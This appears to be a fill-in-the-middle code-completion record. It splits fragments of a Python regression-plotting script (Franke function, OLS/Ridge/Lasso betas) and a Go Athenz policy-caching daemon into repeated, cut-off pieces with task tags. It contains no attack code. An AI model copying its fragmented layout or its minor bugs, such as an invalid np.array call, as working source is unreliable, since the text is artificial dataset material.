cols=plt.rcParams['axes.prop_cycle'].by_key()['color']
if (btype=='all'):
plt.xlabel(r'Index $i$',fontsize=14)
plt.ylabel(r'$\beta$',fontsize=14)
bc_std=np.zeros(shape=(2,nplt))
bc_std[0,:]=beta-ci_cal
bc_std[1,:]=beta+ci_cal
if (eq_std[0] > 0.0):
be_std=np.array(shape=(2,nplt))
be_std[0,:]=beta-ci_eq
be_std[1,:]=beta+ci_eq
xplt=np.arange(0,nplt,dtype=np.int64)
mplt=xplt
elif (plt_lamb):
plt.xlabel(r'Index $i$',fontsize=14)
plt.ylabel(r'$\beta$',fontsize=14)
for i in range(len(lamb)+1):
if (i == 0):
lab='OLS'
else:
lamb_str,pow_str=get_pow_str(lamb[i-1],1)
lab=r'$\lambda=$ %s$\,\cdot 10^{%s}$'%(lamb_str,pow_str)
plt.plot(np.arange(0,21,dtype='int'),beta[:,i],label=lab,marker='.',ls='-')
plt.legend(loc='lower right')
outfile='beta_all_multi_lamb_'+model+fig_format
plt.savefig('figs/'+outfile, bbox_inches='tight', pad_inches=0.1)
plt.clf()
return
else:
plt.xlabel(r'Split number',fontsize=14)
m_str,pow_str=get_pow_str(b_mean,3)
if (nb > -1):
if (btype=='var'):
plt.ylabel(r'Var[$\beta_{%i}$]'%(nb),fontsize=14)
lab_m=r'E[Var[$\beta_{%i}$]]'%(nb)
else:
plt.ylabel(r'$\beta_{%i}$'%(nb),fontsize=14)
lab_m=r'E[$\beta_{%i}$]'%(nb)
if (plt_val):
lab_m+=r' = %s $\cdot$ $10^{%s}$'%(m_str,pow_str)
else:
if (btype=='var'):
plt.ylabel(r'Var[$\beta$]',fontsize=14)
lab_m=r'E[Var[$\beta$]]'
else:
plt.ylabel(r'$\beta$',fontsize=14)
lab_m=r'E[$\beta$]'
if (plt_val):
lab_m+=r' = %s $\cdot$ $10^{%s}$'%(m_str,pow_str)
std_str,pow_str=get_pow_str(cal_std,3)
lab_std=''+r'$\sigma$'
if (plt_val):
lab_std+=r' = %s $\cdot$ $10^{%s}$'%(std_str,pow_str)
b_m=np.array([b_mean,b_mean])
bc_std=np.array([[b_mean-cal_std,b_mean-cal_std],[b_mean+cal_std,b_mean+cal_std]])
if (eq_std[0] > 0.0):
be_std=np.array([[b_mean-eq_std,b_mean-eq_std],[b_mean+eq_std,b_mean+eq_std]])
std_str,pow_str=get_pow_str(eq_std,3)
lab_std_eq=''+r'$\sigma_{\mathrm{eq}}$'
if (plt_val):
lab_std_eq+=r' = %s $\cdot$ $10^{%s}$'%(std_str,pow_str)
xplt=np.arange(1,nplt+0.5,dtype=np.int64)
mplt=[1,nplt]
if (not btype=='all'):
plt.plot(xplt,beta,ls='none',marker='.',color=cols[0])
plt.plot(mplt,b_m,color=cols[1],label=lab_m)
minmax=np.zeros(2)
minmax[0]=np.amin(beta)
minmax[1]=np.amax(beta)
db=minmax[1]-minmax[0]
minmax[0]-=db*0.05
minmax[1]+=db*0.2
plt.ylim(minmax)
plt.plot(mplt,bc_std[0,:],color=cols[2],label=lab_std)
else:
plt.plot(xplt,beta,marker='.',color=cols[0])
plt.plot(mplt,bc_std[0,:],color=cols[2])
plt.plot(mplt,bc_std[1,:],color=cols[2])
if (eq_std[0] > 0.0):
plt.plot(mplt,be_std[0,:],color=cols[3],label=lab_std_eq)
plt.plot(mplt,be_std[1,:],color=cols[3])
if (not btype=='all'):
plt.legend(loc='upper right')
#plt.show()
if (btype=='beta'):
outfile='beta'
elif (btype=='var'):
outfile='beta_var'
elif (btype=='all'):
outfile='beta_all'
if (model=='ols'):
outfile+='_ols'
if (deg > -1):
outfile+='_deg%i'%(deg)
if (model=='ridge'):
outfile+='_ridge_lamb%.1e'%(lamb)
if (model=='lasso'):
outfile+='_lasso_lamb%.1e'%(lamb)
else:
outfile='beta_check'
if (n>0):
outfile+='_grid%i'%(n)
if (not btype=='all'):
if (lamb>0.0):
outfile+='_lamb_%.1e'%(lamb)
if ((not btype=='all') and nb > -1):
outfile+='_n%02d'%(nb)
if (plt_title):
if (btype=='beta'):
plt.title(r'Scatterplot of $\beta_{%i}$'%(nb))
elif (btype=='beta_var'):
plt.title(r'Scatterplot of Var[$\beta_{%i}$]'%(nb))
if (eq_std[0] > 0.0):
outfile+='_eq_comp'
if (diff_noise):
outfile+='_diff_noise'
if (var_mse):
outfile+='_varMSE'
outfile+=fig_format
plt.savefig('figs/'+outfile)
plt.clf()
def get_pow_str(in_val,l):
v='%.10e'%(in_val)
a=v.split('e')
v=a[0]
v=v[:2+l]
s=a[1]
if (s[1]=='0'):
s=s[0]+s[2]
if (s[0]=='+'):
s=s[1:]
return v,s
| if (plt_title):
plt.title('Franke function')
filename='franke_function'
if (noise):
filename+='_noise'
if (colbar):
filename+='_cbar'
filename+=fig_format | conditional_block |
plot_3d.py |
from mpl_toolkits.mplot3d import Axes3D
from setup_matplotlib import *
from matplotlib import cm
from matplotlib.ticker import LinearLocator, FormatStrFormatter
import numpy as np
from sklearn import linear_model
#from random import random, seed
import time
from params import *
from linreg_functions import *
def plot_3D(n,lamb=[0.0],rand=False,var_check=False,diff_noise=False,exit_early=True,var_mse=False):
# Make data.
|
def plot_surf(x,y,z,zfit=0.0,model='none',deg=-1,lamb=0.0,noise=False,colbar=False,plt_title=False):
# Plot the surface.
global fig_format
fig = plt.figure(1)
ax = fig.gca(projection='3d')
surf = ax.plot_surface(x, y, z, cmap=cm.coolwarm,linewidth=0, antialiased=False, alpha=0.6)
if (not model=='none'):
ax.scatter(x,y,zfit,marker='.',s=1.,color='r')
# Customize the z axis.
ax.set_zlim(-0.10, 1.40)
ax.zaxis.set_major_locator(LinearLocator(10))
ax.zaxis.set_major_formatter(FormatStrFormatter('%.02f'))
ax.view_init(elev=10., azim=65.)
# Add a color bar which maps values to colors.
if (colbar):
fig.colorbar(surf, shrink=0.5, aspect=5)
if (lamb==0.0):
lamb_str='0'
else:
lamb_str='%.2e'%(lamb)
a=lamb_str.split('e')
power=a[1]
lamb_str=a[0]
if (power[0]=='-'):
sign='-'
else:
sign=''
power=power[1:]
if (power[0]=='0'):
power=power[1:]
plt.xlabel('x',fontsize=14)
plt.ylabel('y',fontsize=14,labelpad=10)
plt.yticks(rotation=45)
if (model=='none'):
if (plt_title):
plt.title('Franke function')
filename='franke_function'
if (noise):
filename+='_noise'
if (colbar):
filename+='_cbar'
filename+=fig_format
elif (model=='ols'):
if (plt_title):
plt.title(r'OLS, $p=$ %i'%(deg))
filename='ols'
if (noise):
filename+='_noise'
if (colbar):
filename+='_cbar'
filename+='_p%i'%(deg)+fig_format
elif (model=='ridge'):
if (plt_title):
plt.title(r'Ridge, $\lambda = %s \cdot 10^{%s}$'%(lamb_str,sign+power))
filename='ridge'
if (noise):
filename+='_noise'
if (colbar):
filename+='_cbar'
filename+='_lamb_%.2e'%(lamb)+fig_format
elif (model=='lasso'):
if (plt_title):
plt.title(r'Lasso, $\lambda = %s \cdot 10^{%s}$'%(lamb_str,sign+power))
filename='lasso'
if (noise):
filename+='_noise'
if (colbar):
filename+='_cbar'
filename+='_lamb_%.2e'%(lamb)+fig_format
else:
plt.clf()
return
if (debug):
plt.show()
plt.savefig('figs/'+filename, bbox_inches='tight', pad_inches=0.1)
plt.clf()
return
def plot_betas(beta,cal_std=0.0,b_mean=0.0,nb=-1,n=-1,eq_std=[-1.0],model='none',btype='none',ci=1.96,plt_title=False,plt_val=False,diff_noise=False,lamb=-1.0,var_mse=False,deg=-1,plt_lamb=False):
ci_cal=cal_std*ci
if (eq_std[0] > 0.0):
ci_eq=eq_std*ci
nplt=len(beta)
plt.figure(1)
cols=plt.rcParams['axes.prop_cycle'].by_key()['color']
if (btype=='all'):
plt.xlabel(r'Index $i$',fontsize=14)
plt.ylabel(r'$\beta$',fontsize=14)
bc_std=np.zeros(shape=(2,nplt))
bc_std[0,:]=beta-ci_cal
bc_std[1,:]=beta+ci_cal
if (eq_std[0] > 0.0):
be_std=np.array(shape=(2,nplt))
be_std[0,:]=beta-ci_eq
be_std[1,:]=beta+ci_eq
xplt=np.arange(0,nplt,dtype=np.int64)
mplt=xplt
elif (plt_lamb):
plt.xlabel(r'Index $i$',fontsize=14)
plt.ylabel(r'$\beta$',fontsize=14)
for i in range(len(lamb)+1):
if (i == 0):
lab='OLS'
else:
lamb_str,pow_str=get_pow_str(lamb[i-1],1)
lab=r'$\lambda=$ %s$\,\cdot 10^{%s}$'%(lamb_str,pow_str)
plt.plot(np.arange(0,21,dtype='int'),beta[:,i],label=lab,marker='.',ls='-')
plt.legend(loc='lower right')
outfile='beta_all_multi_lamb_'+model+fig_format
plt.savefig('figs/'+outfile, bbox_inches='tight', pad_inches=0.1)
plt.clf()
return
else:
plt.xlabel(r'Split number',fontsize=14)
m_str,pow_str=get_pow_str(b_mean,3)
if (nb > -1):
if (btype=='var'):
plt.ylabel(r'Var[$\beta_{%i}$]'%(nb),fontsize=14)
lab_m=r'E[Var[$\beta_{%i}$]]'%(nb)
else:
plt.ylabel(r'$\beta_{%i}$'%(nb),fontsize=14)
lab_m=r'E[$\beta_{%i}$]'%(nb)
if (plt_val):
lab_m+=r' = %s $\cdot$ $10^{%s}$'%(m_str,pow_str)
else:
if (btype=='var'):
plt.ylabel(r'Var[$\beta$]',fontsize=14)
lab_m=r'E[Var[$\beta$]]'
else:
plt.ylabel(r'$\beta$',fontsize=14)
lab_m=r'E[$\beta$]'
if (plt_val):
lab_m+=r' = %s $\cdot$ $10^{%s}$'%(m_str,pow_str)
std_str,pow_str=get_pow_str(cal_std,3)
lab_std=''+r'$\sigma$'
if (plt_val):
lab_std+=r' = %s $\cdot$ $10^{%s}$'%(std_str,pow_str)
b_m=np.array([b_mean,b_mean])
bc_std=np.array([[b_mean-cal_std,b_mean-cal_std],[b_mean+cal_std,b_mean+cal_std]])
if (eq_std[0] > 0.0):
be_std=np.array([[b_mean-eq_std,b_mean-eq_std],[b_mean+eq_std,b_mean+eq_std]])
std_str,pow_str=get_pow_str(eq_std,3)
lab_std_eq=''+r'$\sigma_{\mathrm{eq}}$'
if (plt_val):
lab_std_eq+=r' = %s $\cdot$ $10^{%s}$'%(std_str,pow_str)
xplt=np.arange(1,nplt+0.5,dtype=np.int64)
mplt=[1,nplt]
if (not btype=='all'):
plt.plot(xplt,beta,ls='none',marker='.',color=cols[0])
plt.plot(mplt,b_m,color=cols[1],label=lab_m)
minmax=np.zeros(2)
minmax[0]=np.amin(beta)
minmax[1]=np.amax(beta)
db=minmax[1]-minmax[0]
minmax[0]-=db*0.05
minmax[1]+=db*0.2
plt.ylim(minmax)
plt.plot(mplt,bc_std[0,:],color=cols[2],label=lab_std)
else:
plt.plot(xplt,beta,marker='.',color=cols[0])
plt.plot(mplt,bc_std[0,:],color=cols[2])
plt.plot(mplt,bc_std[1,:],color=cols[2])
if (eq_std[0] > 0.0):
plt.plot(mplt,be_std[0,:],color=cols[3],label=lab_std_eq)
plt.plot(mplt,be_std[1,:],color=cols[3])
if (not btype=='all'):
plt.legend(loc='upper right')
#plt.show()
if (btype=='beta'):
outfile='beta'
elif (btype=='var'):
outfile='beta_var'
elif (btype=='all'):
outfile='beta_all'
if (model=='ols'):
outfile+='_ols'
if (deg > -1):
outfile+='_deg%i'%(deg)
if (model=='ridge'):
outfile+='_ridge_lamb%.1e'%(lamb)
if (model=='lasso'):
outfile+='_lasso_lamb%.1e'%(lamb)
else:
outfile='beta_check'
if (n>0):
outfile+='_grid%i'%(n)
if (not btype=='all'):
if (lamb>0.0):
outfile+='_lamb_%.1e'%(lamb)
if ((not btype=='all') and nb > -1):
outfile+='_n%02d'%(nb)
if (plt_title):
if (btype=='beta'):
plt.title(r'Scatterplot of $\beta_{%i}$'%(nb))
elif (btype=='beta_var'):
plt.title(r'Scatterplot of Var[$\beta_{%i}$]'%(nb))
if (eq_std[0] > 0.0):
outfile+='_eq_comp'
if (diff_noise):
outfile+='_diff_noise'
if (var_mse):
outfile+='_varMSE'
outfile+=fig_format
plt.savefig('figs/'+outfile)
plt.clf()
def get_pow_str(in_val,l):
v='%.10e'%(in_val)
a=v.split('e')
v=a[0]
v=v[:2+l]
s=a[1]
if (s[1]=='0'):
s=s[0]+s[2]
if (s[0]=='+'):
s=s[1:]
return v,s
| n2=n**2
np.random.seed(seed)
x = np.arange(0, 1.0001, 1.0/(n-1))
y = np.arange(0, 1.0001, 1.0/(n-1))
x, y = np.meshgrid(x,y)
z0 = FrankeFunction(x, y)
if (verbosity>0):
print('')
print('#############################################')
print('')
if (not (var_check and diff_noise)):
if (sigma>0.0):
noise=np.random.normal(0.0,sigma,size=(n,n))
z=z0+noise
else:
z=z0
xv,yv,fv=init_xy_vectors(n,rand,rearr=True,x=x,y=y,z=z)
if (var_check): #check the variance terms of beta vs. the equation from lecture notes
# Var[beta_j]=sigma^2 * ((X.T@X)^-1)_jj
if (verbosity>0):
print('Variance check, lambda %.2e'%lamb[0])
if (diff_noise):
#add different noise for each split. Requires no noise in base data
fv0=np.copy(fv)
deg=5
n_p=(deg+1)*(deg+2)//2
k=4
m=100 #100 different splits
beta_mean=np.zeros(n_p)
betas=np.zeros(shape=(n_p,m*k))
bvs=np.zeros(shape=(n_p,m*k))
bv_calc=np.zeros(n_p)
bv_std=np.zeros(n_p)
bv_sum=np.zeros(n_p)
for i in range(m):
if (verbosity>1):
print('split number %i of %i'%(i,m))
if (diff_noise):#add different noise for each split. Requires no noise in base data
fv = fv0 + np.random.normal(0.0,sigma,size=(n**2,1))
xk,yk,fk,nk=split_data_kfold(xv,yv,fv,k)
mse,r2,betak,bv=polfit_kfold(xk,yk,fk,nk,k,n2,deg=5,lamb=lamb[0],var_mse=var_mse)
#get all beta values and estimated variances from all k-fold fits
betas[:,i*k:(i+1)*k]=betak*1.0
bvs[:,i*k:(i+1)*k]=bv*1.0
bv_sum+=np.mean(bv,axis=1) #get the mean of the estimated var
beta_mean=np.mean(betas,axis=1)
bv_mean=bv_sum/m
be_std=np.sqrt(bv_mean)
for i in range(m*k):
for j in range(n_p):
bv_calc[j]+=(betas[j,i]-beta_mean[j])**2
bv_std[j]+=(bvs[j,i]-bv_mean[j])**2
bv_calc=bv_calc/(m*k)
bv_std=np.sqrt(bv_std/(m*k))
b_std=np.sqrt(bv_calc)
if (verbosity > 0):
print('')
print('Plotting betas')
for i in range(n_p):
if (verbosity>1):
print('beta %i: calc_var = %10.5f , eq_var = %10.5f'%(i,bv_calc[i],bv_mean[i]))
plot_betas(betas[i,:],cal_std=b_std[i],b_mean=beta_mean[i],eq_std=np.array([be_std[i]]),nb=i,lamb=lamb[0],n=n,btype='beta',plt_title=False,plt_val=True,diff_noise=diff_noise,var_mse=var_mse)
plot_betas(bvs[i,:],cal_std=bv_std[i],b_mean=bv_mean[i],nb=i,lamb=lamb[0],n=n,btype='var',plt_title=False,plt_val=True,diff_noise=diff_noise,var_mse=var_mse)
if (exit_early):
return
#Plot the surface without noise
if (verbosity>0):
print('Plotting Franke function without noise')
plot_surf(x,y,z0,colbar=True)
plot_surf(x,y,z0,plt_title=True)
if (var_check and diff_noise):
if (sigma>0.0):
noise=np.random.normal(0.0,sigma,size=(n,n))
z=z0+noise
#Plot the surface
if (verbosity>0):
print('Plotting Franke function with noise')
plot_surf(x,y,z,noise=True)
plot_surf(x,y,z,noise=True,colbar=True)
# Do a 4-fold CV using OLS and complexities ranging from 0 to 5th polynomial
k=4
xk,yk,fk,nk=split_data_kfold(xv,yv,fv,k)
for deg in range(6):
if (verbosity>0):
print('Plotting OLS, polynomial degree %i'%deg)
mse,r2,betak,bv=polfit_kfold(xk,yk,fk,nk,k,n2,deg=deg,lamb=0.0)
beta=np.mean(betak,axis=1)
beta_std=np.sqrt(np.mean(bv,axis=1))
zfit=eval_pol3D(beta,x,y,deg)
plot_surf(x,y,z,zfit=zfit,model='ols',deg=deg,lamb=1e-4,noise=True)
plot_betas(beta,cal_std=beta_std,n=n,model='ols',deg=deg,btype='all')
#Do a Ridge regression for chosen lambda values for 5th degree polynomial fit
lamb=[1.0,1e-2,1e-4,1e-6]
beta_l=np.zeros(shape=(21,6))
beta_l[:,0]=beta
deg=5
for i in range(len(lamb)):
if (verbosity>0):
print('Plotting Ridge, lambda %.2e'%lamb[i])
mse,r2,betak,bv=polfit_kfold(xk,yk,fk,nk,k,n2,deg=deg,lamb=lamb[i])
beta=np.mean(betak,axis=1)
beta_std=np.sqrt(np.mean(bv,axis=1))
zfit=eval_pol3D(beta,x,y,deg)
beta_l[:,i+1]=beta
plot_surf(x,y,z,zfit=zfit,model='ridge',deg=deg,lamb=lamb[i],noise=True)
plot_betas(beta,cal_std=beta_std,n=n,model='ridge',lamb=lamb[i],btype='all')
plot_betas(beta_l,lamb=lamb,model='ridge',plt_lamb=True)
#Do a Lasso regression for chosen lambda values for 5th degree polynomial fit
lamb=[1.0,1e-2,1e-4,1e-6]
for i in range(len(lamb)):
if (verbosity>0):
print('Plotting Lasso, lambda %.2e'%lamb[i])
mse,r2,betak=kfold_CV_lasso(xk,yk,fk,nk,k,n2,deg=deg,lamb=lamb[i])
beta=np.mean(betak,axis=1)
beta_l[:,i+1]=beta
zfit=eval_pol3D(beta,x,y,deg)
plot_surf(x,y,z,zfit=zfit,model='lasso',deg=deg,lamb=lamb[i],noise=True)
plot_betas(beta,n=n,model='lasso',lamb=lamb[i],btype='all')
plot_betas(beta_l,lamb=lamb,model='lasso',plt_lamb=True)
return | identifier_body |
daemon.go | /*
Copyright (C) 2018 Yahoo Japan Corporation Athenz team.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package policy
import (
"context"
"encoding/json"
"fmt"
"io"
"io/ioutil"
"net/http"
"strings"
"sync"
"time"
"github.com/kpango/gache"
"github.com/kpango/glg"
"github.com/pkg/errors"
"github.com/yahoo/athenz/utils/zpe-updater/util"
"github.com/yahoojapan/athenz-authorizer/pubkey"
"golang.org/x/sync/errgroup"
)
// Policyd represent the daemon to retrieve policy data from Athenz.
type Daemon interface {
Start(context.Context) <-chan error
Update(context.Context) error
CheckPolicy(ctx context.Context, domain string, roles []string, action, resource string) error
GetPolicyCache(context.Context) map[string]interface{}
}
type policyd struct {
expireMargin time.Duration // expire margin force update policy when the policy expire time hit the margin
rolePolicies gache.Gache //*sync.Map // map[<domain>:role.<role>][]Assertion
policyExpiredDuration time.Duration
refreshDuration time.Duration
//flushDur time.Duration
errRetryInterval time.Duration
pkp pubkey.Provider
etagCache gache.Gache
etagFlushDur time.Duration
etagExpTime time.Duration
// www.athenz.com/zts/v1
athenzURL string
athenzDomains []string
client *http.Client
}
type etagCache struct {
eTag string
sp *SignedPolicy
}
// New represent the constructor of Policyd
func New(opts ...Option) (Daemon, error) {
p := &policyd{
rolePolicies: gache.New(),
etagCache: gache.New(),
}
for _, opt := range append(defaultOptions, opts...) {
if err := opt(p); err != nil {
return nil, errors.Wrap(err, "error create policyd")
}
}
return p, nil
}
// Start starts the Policy daemon to retrive the policy data periodically
func (p *policyd) Start(ctx context.Context) <-chan error {
glg.Info("Starting policyd updater")
ech := make(chan error, 100)
fch := make(chan struct{}, 1)
if err := p.Update(ctx); err != nil {
glg.Debugf("Error initialize policy data, err: %v", err)
ech <- errors.Wrap(err, "error update policy")
fch <- struct{}{}
}
go func() {
defer close(fch)
defer close(ech)
p.etagCache.StartExpired(ctx, p.etagFlushDur)
ticker := time.NewTicker(p.refreshDuration)
for {
select {
case <-ctx.Done():
glg.Info("Stopping policyd updater")
ticker.Stop()
ech <- ctx.Err()
return
case <-fch:
if err := p.Update(ctx); err != nil {
ech <- errors.Wrap(err, "error update policy")
time.Sleep(p.errRetryInterval)
select {
case fch <- struct{}{}:
default:
glg.Warn("failure queue already full")
}
}
case <-ticker.C:
if err := p.Update(ctx); err != nil {
ech <- errors.Wrap(err, "error update policy")
select {
case fch <- struct{}{}:
default:
glg.Warn("failure queue already full")
}
}
}
}
}()
return ech
}
// Update updates and cache policy data
func (p *policyd) Update(ctx context.Context) error {
glg.Info("Updating policy")
defer glg.Info("Updated policy")
eg := errgroup.Group{}
rp := gache.New()
for _, domain := range p.athenzDomains {
select {
case <-ctx.Done():
glg.Info("Update policy interrupted")
return ctx.Err()
default:
dom := domain
eg.Go(func() error {
select {
case <-ctx.Done():
glg.Info("Update policy interrupted")
return ctx.Err()
default:
return p.fetchAndCachePolicy(ctx, rp, dom)
}
})
}
}
if err := eg.Wait(); err != nil {
return err
}
rp.StartExpired(ctx, p.policyExpiredDuration).
EnableExpiredHook().
SetExpiredHook(func(ctx context.Context, key string) {
//key = <domain>:role.<role>
p.fetchAndCachePolicy(ctx, p.rolePolicies, strings.Split(key, ":role.")[0])
})
p.rolePolicies, rp = rp, p.rolePolicies
rp.Stop()
rp.Clear()
return nil
}
// CheckPolicy checks the specified request has privilege to access the resources or not.
// If return is nil then the request is allowed, otherwise the request is rejected.
func (p *policyd) CheckPolicy(ctx context.Context, domain string, roles []string, action, resource string) error {
ech := make(chan error, 1)
cctx, cancel := context.WithCancel(ctx)
defer cancel()
go func() {
defer close(ech)
wg := new(sync.WaitGroup)
for _, role := range roles {
dr := fmt.Sprintf("%s:role.%s", domain, role)
wg.Add(1)
go func(ch chan<- error) {
defer wg.Done()
select {
case <-cctx.Done():
ch <- cctx.Err()
return
default:
asss, ok := p.rolePolicies.Get(dr)
if !ok {
return
}
for _, ass := range asss.([]*Assertion) {
glg.Debugf("Checking policy domain: %s, role: %v, action: %s, resource: %s, assertion: %v", domain, roles, action, resource, ass)
select {
case <-cctx.Done():
ch <- cctx.Err()
return
default:
if strings.EqualFold(ass.ResourceDomain, domain) && ass.Reg.MatchString(strings.ToLower(action+"-"+resource)) {
ch <- ass.Effect
return
}
}
}
}
}(ech)
}
wg.Wait()
ech <- errors.Wrap(ErrNoMatch, "no match")
}()
err := <-ech
glg.Debugf("check policy domain: %s, role: %v, action: %s, resource: %s, result: %v", domain, roles, action, resource, err)
return err
}
func (p *policyd) GetPolicyCache(ctx context.Context) map[string]interface{} {
return p.rolePolicies.ToRawMap(ctx)
}
func (p *policyd) fetchAndCachePolicy(ctx context.Context, g gache.Gache, dom string) error {
spd, upd, err := p.fetchPolicy(ctx, dom)
if err != nil {
glg.Debugf("fetch policy failed, err: %v", err)
return errors.Wrap(err, "error fetch policy")
}
glg.DebugFunc(func() string {
rawpol, _ := json.Marshal(spd)
return fmt.Sprintf("fetched policy data, domain: %s,updated: %v, body: %s", dom, upd, (string)(rawpol))
})
if err = simplifyAndCachePolicy(ctx, g, spd); err != nil {
glg.Debugf("simplify and cache error: %v", err)
return errors.Wrap(err, "error simplify and cache")
}
return nil
}
func (p *policyd) fetchPolicy(ctx context.Context, domain string) (*SignedPolicy, bool, error) {
glg.Infof("Fetching policy for domain %s", domain)
// https://{www.athenz.com/zts/v1}/domain/{athenz domain}/signed_policy_data
url := fmt.Sprintf("https://%s/domain/%s/signed_policy_data", p.athenzURL, domain)
glg.Debugf("fetching policy, url: %v", url)
req, err := http.NewRequest(http.MethodGet, url, nil)
if err != nil {
glg.Errorf("fetch policy error, domain: %s, error: %v", domain, err)
return nil, false, errors.Wrap(err, "error creating fetch policy request")
}
// etag header
t, ok := p.etagCache.Get(domain)
if ok {
ec := t.(*etagCache)
if time.Now().Add(p.expireMargin).UnixNano() < ec.sp.SignedPolicyData.Expires.UnixNano() {
glg.Debugf("domain: %s, using etag: %s", domain, ec.eTag)
req.Header.Set("If-None-Match", ec.eTag)
}
}
res, err := p.client.Do(req.WithContext(ctx))
if err != nil {
glg.Errorf("Error making HTTP request, domain: %s, error: %v", domain, err)
return nil, false, errors.Wrap(err, "error making request")
}
// if server return NotModified, return policy from cache
if res.StatusCode == http.StatusNotModified {
cache := t.(*etagCache)
glg.Debugf("Server return not modified, domain: %s, etag: %v", domain, cache.eTag)
return cache.sp, false, nil
}
if res.StatusCode != http.StatusOK {
glg.Errorf("Domain %s: Server return not OK", domain)
return nil, false, errors.Wrap(ErrFetchPolicy, "error fetching policy data")
}
// read and decode
sp := new(SignedPolicy)
if err = json.NewDecoder(res.Body).Decode(&sp); err != nil {
glg.Errorf("Error decoding policy, domain: %s, err: %v", domain, err)
return nil, false, errors.Wrap(err, "error decode response")
}
// verify policy data
if err = sp.Verify(p.pkp); err != nil {
glg.Errorf("Error verifying policy, domain: %s,err: %v", domain, err)
return nil, false, errors.Wrap(err, "error verify policy data")
}
if _, err = io.Copy(ioutil.Discard, res.Body); err != nil {
glg.Warn(errors.Wrap(err, "error io.copy"))
}
if err = res.Body.Close(); err != nil {
glg.Warn(errors.Wrap(err, "error body.close"))
}
// set eTag cache
eTag := res.Header.Get("ETag")
if eTag != "" {
glg.Debugf("Setting ETag %v for domain %s", eTag, domain)
p.etagCache.SetWithExpire(domain, &etagCache{eTag, sp}, p.etagExpTime)
}
return sp, true, nil
}
func simplifyAndCachePolicy(ctx context.Context, rp gache.Gache, sp *SignedPolicy) error {
eg := errgroup.Group{}
assm := new(sync.Map) // assertion map
// simplify signed policy cache
for _, policy := range sp.DomainSignedPolicyData.SignedPolicyData.PolicyData.Policies {
pol := policy
eg.Go(func() error {
for _, ass := range pol.Assertions {
select {
case <-ctx.Done():
return ctx.Err()
default:
km := fmt.Sprintf("%s,%s,%s", ass.Role, ass.Action, ass.Resource)
if _, ok := assm.Load(km); !ok {
assm.Store(km, ass)
} else {
// deny policy will override allow policy, and also remove duplication
if strings.EqualFold("deny", ass.Effect) {
assm.Store(km, ass)
}
}
}
}
return nil
})
}
if err := eg.Wait(); err != nil {
return errors.Wrap(err, "error simplify and cache policy")
}
// cache
var retErr error
assm.Range(func(k interface{}, val interface{}) bool {
ass := val.(*util.Assertion)
a, err := NewAssertion(ass.Action, ass.Resource, ass.Effect)
if err != nil {
glg.Debugf("error adding assertion to the cache, err: %v", err)
retErr = err
return false
}
var asss []*Assertion
r := ass.Role
if r, ok := rp.Get(r); ok | else {
asss = []*Assertion{a}
}
rp.SetWithExpire(ass.Role, asss, time.Duration(sp.DomainSignedPolicyData.SignedPolicyData.Expires.UnixNano()))
glg.Debugf("added assertion to the cache: %+v", ass)
return true
})
if retErr != nil {
return retErr
}
return nil
}
| {
asss = append(r.([]*Assertion), a)
} | conditional_block |
daemon.go | /*
Copyright (C) 2018 Yahoo Japan Corporation Athenz team.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package policy
import (
"context"
"encoding/json"
"fmt"
"io"
"io/ioutil"
"net/http"
"strings"
"sync"
"time"
"github.com/kpango/gache"
"github.com/kpango/glg"
"github.com/pkg/errors"
"github.com/yahoo/athenz/utils/zpe-updater/util"
"github.com/yahoojapan/athenz-authorizer/pubkey"
"golang.org/x/sync/errgroup"
)
// Policyd represent the daemon to retrieve policy data from Athenz.
type Daemon interface {
Start(context.Context) <-chan error
Update(context.Context) error
CheckPolicy(ctx context.Context, domain string, roles []string, action, resource string) error
GetPolicyCache(context.Context) map[string]interface{}
}
type policyd struct {
expireMargin time.Duration // expire margin force update policy when the policy expire time hit the margin
rolePolicies gache.Gache //*sync.Map // map[<domain>:role.<role>][]Assertion
policyExpiredDuration time.Duration
refreshDuration time.Duration
//flushDur time.Duration
errRetryInterval time.Duration
pkp pubkey.Provider
etagCache gache.Gache
etagFlushDur time.Duration
etagExpTime time.Duration
// www.athenz.com/zts/v1
athenzURL string
athenzDomains []string
client *http.Client
}
type etagCache struct {
eTag string
sp *SignedPolicy
}
// New represent the constructor of Policyd
func New(opts ...Option) (Daemon, error) {
p := &policyd{
rolePolicies: gache.New(),
etagCache: gache.New(),
}
for _, opt := range append(defaultOptions, opts...) {
if err := opt(p); err != nil {
return nil, errors.Wrap(err, "error create policyd")
}
}
return p, nil
}
// Start starts the Policy daemon to retrive the policy data periodically
func (p *policyd) Start(ctx context.Context) <-chan error {
glg.Info("Starting policyd updater")
ech := make(chan error, 100)
fch := make(chan struct{}, 1)
if err := p.Update(ctx); err != nil {
glg.Debugf("Error initialize policy data, err: %v", err)
ech <- errors.Wrap(err, "error update policy")
fch <- struct{}{}
}
go func() {
defer close(fch)
defer close(ech)
p.etagCache.StartExpired(ctx, p.etagFlushDur)
ticker := time.NewTicker(p.refreshDuration)
for {
select {
case <-ctx.Done():
glg.Info("Stopping policyd updater")
ticker.Stop()
ech <- ctx.Err()
return
case <-fch:
if err := p.Update(ctx); err != nil {
ech <- errors.Wrap(err, "error update policy")
time.Sleep(p.errRetryInterval)
select {
case fch <- struct{}{}:
default:
glg.Warn("failure queue already full")
}
}
case <-ticker.C:
if err := p.Update(ctx); err != nil {
ech <- errors.Wrap(err, "error update policy")
select {
case fch <- struct{}{}:
default:
glg.Warn("failure queue already full")
}
}
}
}
}()
return ech
}
// Update updates and cache policy data
func (p *policyd) Update(ctx context.Context) error {
glg.Info("Updating policy")
defer glg.Info("Updated policy")
eg := errgroup.Group{}
rp := gache.New()
for _, domain := range p.athenzDomains {
select {
case <-ctx.Done():
glg.Info("Update policy interrupted")
return ctx.Err()
default:
dom := domain
eg.Go(func() error {
select {
case <-ctx.Done():
glg.Info("Update policy interrupted")
return ctx.Err()
default:
return p.fetchAndCachePolicy(ctx, rp, dom)
}
})
}
}
if err := eg.Wait(); err != nil {
return err
}
